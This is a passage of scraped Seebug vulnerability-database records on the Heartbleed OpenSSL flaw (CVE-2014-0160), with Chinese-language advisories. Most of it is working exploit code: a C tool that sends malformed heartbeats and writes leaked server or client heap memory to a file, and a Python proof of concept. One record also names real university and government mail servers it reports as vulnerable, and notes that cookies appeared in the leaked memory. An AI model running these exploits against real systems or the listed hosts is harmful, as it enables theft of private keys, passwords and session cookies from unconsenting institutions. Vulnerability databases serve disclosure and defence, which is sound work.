anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tret = tcp_connect(host, port);\r\n\t\tpre_cmd(ret, precmd, verbose);\r\n\t\tc = tls_connect(ret);\r\n\t\theartbleed(c,type);\r\n\t\twhile(repeat==1){\r\n\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t}\r\n\t\twhile(loop==1){\r\n\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\tfirst=0;\r\n\t\t\trepeat=1;\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t}\r\n\t\tprintf("[ done.\\n");\r\n\t\texit(0);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tret = tcp_bind(host, port);\r\n\t\twhile(1){\r\n \t\t\tsd=accept(ret,0,0);\r\n\t\t\tif(sd==-1){\r\n\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\tif(pid=fork()){\r\n\t\t\t\tclose(sd);\r\n\t\t\t}\r\n \t\t\telse{\r\n\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t\twhile(loop==1){\r\n\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\tfirst=0;\r\n\t\t\t\t\trepeat=0;\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86061", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nSophos Antivirus\u662f\u4e00\u6b3e\u9632\u75c5\u6bd2\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSophos Antivirus for vShield\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSophos Antivirus for vShield 1.0\r\nSophos Antivirus for vShield 1.1\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.sophos.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Sophos Antivirus for vShield OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62197", "id": "SSV:62197", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:54", "description": "CVE ID:CVE-2014-0160\r\n\r\nSplunk\u662f\u673a\u5668\u6570\u636e\u7684\u5f15\u64ce\u3002\u4f7f\u7528Splunk\u53ef\u6536\u96c6\u3001\u7d22\u5f15\u548c\u5229\u7528\u6240\u6709\u5e94\u7528\u7a0b\u5e8f\u3001\u670d\u52a1\u5668\u548c\u8bbe\u5907\uff08\u7269\u7406\u3001\u865a\u62df\u548c\u4e91\u4e2d\uff09\u751f\u6210\u7684\u5feb\u901f\u79fb\u52a8\u578b\u8ba1\u7b97\u673a\u6570\u636e\u3002\r\n\r\nSplunk\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\n0\nSplunk 6.x\nSplunk 6.0.3\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.splunk.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Splunk OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62198", "id": "SSV:62198", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:43", "description": "CVE ID:CVE-2014-0160\r\n\r\nOracle Session Monitor Suite\u662f\u4e00\u6b3eOracle\u516c\u53f8\u63a8\u51fa\u7684\u4f1a\u8bdd\u76d1\u89c6\u5957\u4ef6\u3002\r\n\r\nOracle Session Monitor Suite\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\r\n0\r\nOracle Session Monitor Suite 3.x\r\nOracle Session Monitor Suite 3.3.40.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.oracle.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "Oracle Session Monitor Suite OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62240", "id": "SSV:62240", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:32", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u6253\u5305\u4e86\u4e00\u5806\u7f51\u7ad9,\u5185\u5b58\u91cc\u6709cookies :D\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\neYouMail 5 inurl:edu\n\u641c\u7d20\u51fa\u6765\u5c31\u80fd\u6709\u6f0f\u6d1e\u7684\u673a\u738790%\u5de6\u53f3\n\u524d\u4e09\u9875\u6210\u529f\u7684\u7ed3\u679c\n\n\n```\nmail.jn.gov.cn\nmail.hpu.edu.cn\nmail.just.edu.cn\nmail.hnust.edu.cn\nmail.tjut.edu.cn\nmail.shupl.edu.cn\nmail.haust.edu.cn\nmail.dufe.edu.cn\nmail.jliae.edu.cn\nmail.hist.edu.cn\ndn1s.cmc.edu.cn\nmail.hbpu.edu.cn\nmail.dzu.edu.cn\n```\n\n\nPOC\u9001\u4e0a \u81ea\u5df1\u6d4b\u8bd5\n\n\n```\n#!/usr/bin/python\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n #print pay\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\nif __name__ == '__main__':\n main()\n```\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg\" alt=\"1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg\" alt=\"2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg)\n\n\n\u5185\u5b58\u91cc\u6709cookies \n\n[<img 